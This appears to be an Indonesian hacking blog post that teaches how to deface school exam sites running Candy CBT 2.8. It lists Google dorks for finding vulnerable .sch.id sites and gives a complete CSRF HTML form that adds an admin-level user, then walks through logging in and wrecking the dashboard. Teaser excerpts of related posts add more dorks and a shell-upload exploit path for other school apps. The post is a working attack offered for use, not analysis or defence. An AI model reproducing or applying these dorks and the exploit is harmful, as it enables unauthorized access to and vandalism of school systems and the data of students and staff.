TUTORIAL EXPLOIT CANDY CBT 2.8 ADD USER WITH CSRF

 TUTORIAL DEFACE EXPLOIT CANDY CBT 2.8 ADD USER WITH CSRF


Upload By Lucifer25




Assalamualaikum hallo guys gw lucifer25 mau memberikan tutorial atau edukasi deface exploit candy cbt 2.8 add user with csrf


Bahan:

-Hp/Pc

-Dork

-Exploit

-Csrf


Dork:

- "powered by candy v2.8.0"

- inurl:cbt candy intext:responsive image

- intext:Support By Candy CBT v2.8.0 r3

- "responsive image" "support" intitle:login

- inurl:login cbt site:sch.id

KEMBANGIN LAGI!!


Csrf:

===================

<html>

 <head></head>

 <body>

 <form action="https://target.sch.id/admin/?pg=pengawas" method="post">

 <label>nip</label>

 <input type="text" name="nip" value="123761717" required="true" />

 <br>

 <label>nama</label>

 <input type="text" name="nama" required="true" />

 <br>

 <label>username</label>

 <input type="text" name="username" required="true" />

 <br>

 <label>password</label>

 <input type="password" name="pass1" required="true" />

 <br>

 <label>ulang password</label>

 <input type="password" name="pass2" required="true" />

 <br>

 <button type="submit" name="submit">simpan</button>

 </form>

 </body>

 </html>

==============================================


1. PERTAMA KALIAN CARI TARGET MENGGUNAKAN DORK DI ATAS


2. KALIAN BUKA FILE CSRF KALIAN TERUS EDIT DI BAGIAN FORM ACTION UBAH MENJADI URL TARGET KALIAN



3. JIKA SUDAH SAVE AJA TERUS BUKA DI BROWSER KALIAN ISI USERNYA BEBAS TERSERAH KALIAN TERUS KLIK SAVE



4. LANJUT KALIAN LOGIN AJA USER YANG UDAH KALIAN BIKIN



5. DAN YAP KALIAN BERHASIL LOGIN KE DASHBOARD ADMIN DISINI KALIAN BEBAS NGAPAIN DI ACAK ACAK JUGA GAPAPA😂



OKE CUKUP SEKIAN MATERI/TUTORIAL KALI INI DARI GW SEMOGA BERMANFAAT BYEEE BYEEEEEEEEE KONTTTTTTTTT



Thanks To :
> Monarchy Cyber Team
> Jawa Tengah Error System
> Kebumen Blackhat
> All Member



#fromcybertobrother
#fromlammertomastah
#fromlosertohaxor
#happylearn
#happydeface
#nostsyemissafe

Komentar

Posting Komentar

Postingan populer dari blog ini

TUTORIAL DEFACE POC KARTU PELAJAR VULNEARBILITY UP SHELL / TEBAS INDEX WITH CSRF

Gambar
TUTORIAL DEFACE POC KARTU PELAJAR VULNEARBILITY UP SHELL / TEBAS INDEX WITH CSRF   Upload By ./Lucifer25 Assalamualaikum hallo guys gw lucifer25 mau memberikan tutorial atau edukasi deface poc kartu pelajar up shell / tebas index with csrf Bahan: -Hp/Pc -Dork -Exploit -Shell & Sc Deface  Dork: - intext:Responsive image aplikasi kartu pelajar - intext:"kartu pelajar" - intext:"responsive image" site:"sch.id" - inurl:/login intext:kartu pelajar - intext:Powered by AC Fight site:sch.id - intext:image-responsive site:sch.id - intitle:kartu pelajar site:sch.id Exploit: /user/aksi/ubah_pelajar.php 1. LANGKAH PERTAMA KALIAN CARI DULU TARGET YANG VULN PAKAI DORK YANG ADA DI ATAS 2. JIKA KALIAN SUDAH MENEMUKAN TARGETNYA LANGSUNG SAJA INPUT EXPLOIT  3. NAH KALAU MUNCUL PROMPT DATA BERHASIL DIUBAH ITU TANDANYA WEBSITENYA VULN, DAN LANGSUNG BISA KALIAN UPLOAD SHELL 4. NAH JIKA MUNCUL SEPERTI INI LAGI BERARTI SHELL KALIAN BERHASIL TER UPLOAD 5. KALIAN BISA PANGGIL ...
Baca selengkapnya

TUTORIAL DEFACE POC CBT BEESMART UP SHELL

Gambar
  TUTORIAL DEFACE POC CBT BEESMART UP SHELL Upload By ./Lucifer25 Assalamualaikum hallo guys gw lucifer25 mau memberikan tutorial atau edukasi deface poc cbt beesmart up shell / tebas index Bahan: -Hp/Pc -Dork -Exploit -Shell & Sc Deface  -Google Dork : inurl:/login.php intitle:ujian online inurl:/cbt/login.php site:sch.id inurl:/login.php intitle:cbt beesmart inurl:/login.php inurl:/cbt inurl:/login.php intitle:ujian sekolah inurl:/login.php intitle:ujian sma inurl:/login.php intitle:cbt pintersmart inurl:/login.php intitle:ujian pintersmart inurl:/panel/pages site:.sch.id "Supported By Beesmart" inurl:/panel/pages/login.php inurl:/login.php inurl:/cbt inurl:/login.php intitle:cbt inurl:/panel/pages "Supported By Beesmart" inurl:/login.php "Supported By Beesmart" inurl:/login.php intitle:ujian inurl:/login.php intitle:ujian online inurl:/login.php intitle:ujian sekolah inurl:/login.php intext:cbt inurl:/login.php intext:ujian inurl:/login.php intitle...
Baca selengkapnya